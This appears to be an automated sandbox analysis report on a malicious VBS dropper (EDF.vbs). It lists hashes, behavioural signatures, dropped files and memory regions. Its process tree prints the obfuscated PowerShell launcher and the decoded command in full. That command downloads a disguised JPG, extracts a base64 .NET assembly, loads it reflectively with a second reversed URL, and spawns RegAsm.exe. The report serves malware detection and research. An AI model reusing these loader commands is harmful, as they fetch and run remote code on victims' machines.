Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/09/2023, 13:20

General

  • Target

    EDF.vbs

  • Size

    310KB

  • MD5

    cbf05819243b31316e14ee97ea658361

  • SHA1

    c622321a755761d7c9e9788af0adce9eaa3d18e3

  • SHA256

    068536ef2ccdc4c09fe3da66f911453be231263e8180c817899dbc2872547d16

  • SHA512

    66ac258f43efc76d7db466cc1377b680b88b68648e41a7abf0386a5282ee210c9ec7be6ac4dd29269627d2f13ae1710b6cde24285042fd233045f896360bb6df

  • SSDEEP

    3072:97r/OGPcq3rX5Jcog033nHam2BWntVSbPXM4nnbaB1Hlb9WSWMyprZkXnlOhljes:9/OGPcq3rX5bu

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://uploaddeimagens.com.br/images/004/614/895/original/rump_vbs.jpg?1695246171

exe.dropper

https://uploaddeimagens.com.br/images/004/614/895/original/rump_vbs.jpg?1695246171

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EDF.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4848
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶I◀▶◀▶9◀▶C◀▶◀▶JwBo◀▶HQ◀▶d◀▶Bw◀▶HM◀▶Og◀▶v◀▶C8◀▶dQBw◀▶Gw◀▶bwBh◀▶GQ◀▶Z◀▶Bl◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBu◀▶HM◀▶LgBj◀▶G8◀▶bQ◀▶u◀▶GI◀▶cg◀▶v◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBz◀▶C8◀▶M◀▶◀▶w◀▶DQ◀▶Lw◀▶2◀▶DE◀▶N◀▶◀▶v◀▶Dg◀▶OQ◀▶1◀▶C8◀▶bwBy◀▶Gk◀▶ZwBp◀▶G4◀▶YQBs◀▶C8◀▶cgB1◀▶G0◀▶c◀▶Bf◀▶HY◀▶YgBz◀▶C4◀▶agBw◀▶Gc◀▶Pw◀▶x◀▶DY◀▶OQ◀▶1◀▶DI◀▶N◀▶◀▶2◀▶DE◀▶Nw◀▶x◀▶Cc◀▶Ow◀▶k◀▶Hc◀▶ZQBi◀▶EM◀▶b◀▶Bp◀▶GU◀▶bgB0◀▶C◀▶◀▶PQ◀▶g◀▶E4◀▶ZQB3◀▶C0◀▶TwBi◀▶Go◀▶ZQBj◀▶HQ◀▶I◀▶BT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶E4◀▶ZQB0◀▶C4◀▶VwBl◀▶GI◀▶QwBs◀▶Gk◀▶ZQBu◀▶HQ◀▶Ow◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶I◀▶◀▶9◀▶C◀▶◀▶J◀▶B3◀▶GU◀▶YgBD◀▶Gw◀▶aQBl◀▶G4◀▶d◀▶◀▶u◀▶EQ◀▶bwB3◀▶G4◀▶b◀▶Bv◀▶GE◀▶Z◀▶BE◀▶GE◀▶d◀▶Bh◀▶Cg◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶KQ◀▶7◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶I◀▶◀▶9◀▶C◀▶◀▶WwBT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBF◀▶G4◀▶YwBv◀▶GQ◀▶aQBu◀▶Gc◀▶XQ◀▶6◀▶Do◀▶VQBU◀▶EY◀▶O◀▶◀▶u◀▶Ec◀▶ZQB0◀▶FM◀▶d◀▶By◀▶Gk◀▶bgBn◀▶Cg◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶QgB5◀▶HQ◀▶ZQBz◀▶Ck◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BG◀▶Gw◀▶YQBn◀▶C◀▶◀▶PQ◀▶g◀▶Cc◀▶P◀▶◀▶8◀▶EI◀▶QQBT◀▶EU◀▶Ng◀▶0◀▶F8◀▶UwBU◀▶EE◀▶UgBU◀▶D4◀▶Pg◀▶n◀▶Ds◀▶J◀▶Bl◀▶G4◀▶Z◀▶BG◀▶Gw◀▶YQBn◀▶C◀▶◀▶PQ◀▶g◀▶Cc◀▶P◀▶◀▶8◀▶EI◀▶QQBT◀▶EU◀▶Ng◀▶0◀▶F8◀▶RQBO◀▶EQ◀▶Pg◀▶+◀▶Cc◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶9◀▶C◀▶◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶u◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶BP◀▶GY◀▶K◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BG◀▶Gw◀▶YQBn◀▶Ck◀▶Ow◀▶k◀▶GU◀▶bgBk◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBU◀▶GU◀▶e◀▶B0◀▶C4◀▶SQBu◀▶GQ◀▶ZQB4◀▶E8◀▶Zg◀▶o◀▶CQ◀▶ZQBu◀▶GQ◀▶RgBs◀▶GE◀▶Zw◀▶p◀▶Ds◀▶J◀▶Bz◀▶HQ◀▶YQBy◀▶HQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶LQBn◀▶GU◀▶I◀▶◀▶w◀▶C◀▶◀▶LQBh◀▶G4◀▶Z◀▶◀▶g◀▶CQ◀▶ZQBu◀▶GQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶LQBn◀▶HQ◀▶I◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶r◀▶D0◀▶I◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BG◀▶Gw◀▶YQBn◀▶C4◀▶T◀▶Bl◀▶G4◀▶ZwB0◀▶Gg◀▶Ow◀▶k◀▶GI◀▶YQBz◀▶GU◀▶Ng◀▶0◀▶Ew◀▶ZQBu◀▶Gc◀▶d◀▶Bo◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶ZQBu◀▶GQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶LQ◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶7◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶QwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBU◀▶GU◀▶e◀▶B0◀▶C4◀▶UwB1◀▶GI◀▶cwB0◀▶HI◀▶aQBu◀▶Gc◀▶K◀▶◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶L◀▶◀▶g◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶T◀▶Bl◀▶G4◀▶ZwB0◀▶Gg◀▶KQ◀▶7◀▶CQ◀▶YwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶BC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶I◀▶◀▶9◀▶C◀▶◀▶WwBT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶EM◀▶bwBu◀▶HY◀▶ZQBy◀▶HQ◀▶XQ◀▶6◀▶Do◀▶RgBy◀▶G8◀▶bQBC◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BT◀▶HQ◀▶cgBp◀▶G4◀▶Zw◀▶o◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶QwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶◀▶p◀▶Ds◀▶J◀▶Bs◀▶G8◀▶YQBk◀▶GU◀▶Z◀▶BB◀▶HM◀▶cwBl◀▶G0◀▶YgBs◀▶Hk◀▶I◀▶◀▶9◀▶C◀▶◀▶WwBT◀▶Hk◀▶cwB0◀▶GU◀▶bQ◀▶u◀▶FI◀▶ZQBm◀▶Gw◀▶ZQBj◀▶HQ◀▶aQBv◀▶G4◀▶LgBB◀▶HM◀▶cwBl◀▶G0◀▶YgBs◀▶Hk◀▶XQ◀▶6◀▶Do◀▶T◀▶Bv◀▶GE◀▶Z◀▶◀▶o◀▶CQ◀▶YwBv◀▶G0◀▶bQBh◀▶G4◀▶Z◀▶BC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶KQ◀▶7◀▶CQ◀▶d◀▶B5◀▶H◀▶◀▶ZQ◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gw◀▶bwBh◀▶GQ◀▶ZQBk◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQ◀▶u◀▶Ec◀▶ZQB0◀▶FQ◀▶eQBw◀▶GU◀▶K◀▶◀▶n◀▶EY◀▶aQBi◀▶GU◀▶cg◀▶u◀▶Eg◀▶bwBt◀▶GU◀▶Jw◀▶p◀▶Ds◀▶J◀▶Bt◀▶GU◀▶d◀▶Bo◀▶G8◀▶Z◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶HQ◀▶eQBw◀▶GU◀▶LgBH◀▶GU◀▶d◀▶BN◀▶GU◀▶d◀▶Bo◀▶G8◀▶Z◀▶◀▶o◀▶Cc◀▶VgBB◀▶Ek◀▶Jw◀▶p◀▶C4◀▶SQBu◀▶HY◀▶bwBr◀▶GU◀▶K◀▶◀▶k◀▶G4◀▶dQBs◀▶Gw◀▶L◀▶◀▶g◀▶Fs◀▶bwBi◀▶Go◀▶ZQBj◀▶HQ◀▶WwBd◀▶F0◀▶I◀▶◀▶o◀▶Cc◀▶d◀▶B4◀▶HQ◀▶Lg◀▶4◀▶DY◀▶Mw◀▶0◀▶Hk◀▶ZQ◀▶v◀▶Gw◀▶d◀▶◀▶v◀▶Dc◀▶Ng◀▶x◀▶C4◀▶MQ◀▶2◀▶DE◀▶Lg◀▶2◀▶DU◀▶MQ◀▶u◀▶DQ◀▶OQ◀▶v◀▶C8◀▶OgBw◀▶HQ◀▶d◀▶Bo◀▶Cc◀▶I◀▶◀▶s◀▶C◀▶◀▶JwBi◀▶G8◀▶cwB0◀▶GE◀▶Jw◀▶p◀▶Ck◀▶'";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('◀▶','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/614/895/original/rump_vbs.jpg?1695246171';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.8634ye/lt/761.161.651.49//:ptth' , 'bosta'))"
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5000
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
            PID:4540

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            3KB

            MD5

            f41839a3fe2888c8b3050197bc9a0a05

            SHA1

            0798941aaf7a53a11ea9ed589752890aee069729

            SHA256

            224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

            SHA512

            2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            64B

            MD5

            1a11402783a8686e08f8fa987dd07bca

            SHA1

            580df3865059f4e2d8be10644590317336d146ce

            SHA256

            9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

            SHA512

            5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_loe50mfr.sff.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/2444-0-0x000001A4FA210000-0x000001A4FA232000-memory.dmp

            Filesize

            136KB

          • memory/2444-10-0x00007FFCA4A60000-0x00007FFCA5521000-memory.dmp

            Filesize

            10.8MB

          • memory/2444-12-0x000001A4FA4D0000-0x000001A4FA4E0000-memory.dmp

            Filesize

            64KB

          • memory/2444-11-0x000001A4FA4D0000-0x000001A4FA4E0000-memory.dmp

            Filesize

            64KB

          • memory/2444-42-0x00007FFCA4A60000-0x00007FFCA5521000-memory.dmp

            Filesize

            10.8MB

          • memory/2444-68-0x000001A4FA4D0000-0x000001A4FA4E0000-memory.dmp

            Filesize

            64KB

          • memory/2444-82-0x000001A4FA4D0000-0x000001A4FA4E0000-memory.dmp

            Filesize

            64KB

          • memory/2444-10509-0x00007FFCA4A60000-0x00007FFCA5521000-memory.dmp

            Filesize

            10.8MB

          • memory/5000-52-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-64-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-26-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-27-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-29-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-31-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-33-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-35-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-37-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-39-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-41-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-44-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-46-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-48-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-50-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-24-0x000001E8C4E30000-0x000001E8C4E40000-memory.dmp

            Filesize

            64KB

          • memory/5000-54-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-56-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-58-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-60-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-62-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-25-0x000001E8DE380000-0x000001E8DE6A0000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-66-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-69-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-71-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-73-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-75-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-77-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-79-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-81-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-84-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-86-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-88-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-90-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-92-0x000001E8DE380000-0x000001E8DE69A000-memory.dmp

            Filesize

            3.1MB

          • memory/5000-161-0x00007FFCA4A60000-0x00007FFCA5521000-memory.dmp

            Filesize

            10.8MB

          • memory/5000-163-0x000001E8C4E30000-0x000001E8C4E40000-memory.dmp

            Filesize

            64KB

          • memory/5000-10501-0x000001E8DD750000-0x000001E8DD751000-memory.dmp

            Filesize

            4KB

          • memory/5000-23-0x000001E8C4E30000-0x000001E8C4E40000-memory.dmp

            Filesize

            64KB

          • memory/5000-22-0x00007FFCA4A60000-0x00007FFCA5521000-memory.dmp

            Filesize

            10.8MB

          • memory/5000-10505-0x00007FFCA4A60000-0x00007FFCA5521000-memory.dmp

            Filesize

            10.8MB